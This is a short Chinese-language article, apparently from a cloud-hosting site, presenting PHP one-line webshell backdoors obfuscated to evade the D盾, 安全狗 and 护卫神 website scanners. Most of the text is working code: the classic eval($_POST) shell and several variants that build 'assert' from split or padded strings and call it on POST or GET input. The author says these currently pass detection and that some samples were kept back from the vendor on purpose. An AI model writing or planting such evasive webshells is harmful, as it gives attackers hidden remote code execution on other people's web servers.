欢迎来到云服务器

网络技术

过D盾/安全狗/护卫神的免杀PHP一句话WebShell后门分

过D盾/安全狗/护卫神的免杀PHP一句话WebShell后门分

大家可以看到上图 只是有一部分被杀

最典型最原始的一句话 被杀
<?php @eval($_POST['k8']);?>

下面几个都是变种 不被杀
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>

$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");
$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>

大马的话 Darkshell.php 这个在K8信息安全工具包 PHP马那里有

上面的目前   全过D盾  下一版本 可能就被杀了 因为样本我提交给阿D了
当然只是提交了一部分 还是留了一些过的 但是我不知道别人提供的样本
有没有 那些我没被杀的特征出现 如果有 我手上留的 也会被杀

另外那条"哈巴狗" 和"八神" 我就不测了 之前都是过的 上面都是变异的写法
他们的特征应该都没收集有多少 有些特征可以说是正常行为也是那样写
不好判定成WebShell  要不然误报   有些特征作者都想到了 但是不好列为特征来杀

腾讯云代理

Copyright © 2003-2021 MFISP.COM. 国外vps服务器租用 梦飞云服务器租用 版权所有 粤ICP备11019662号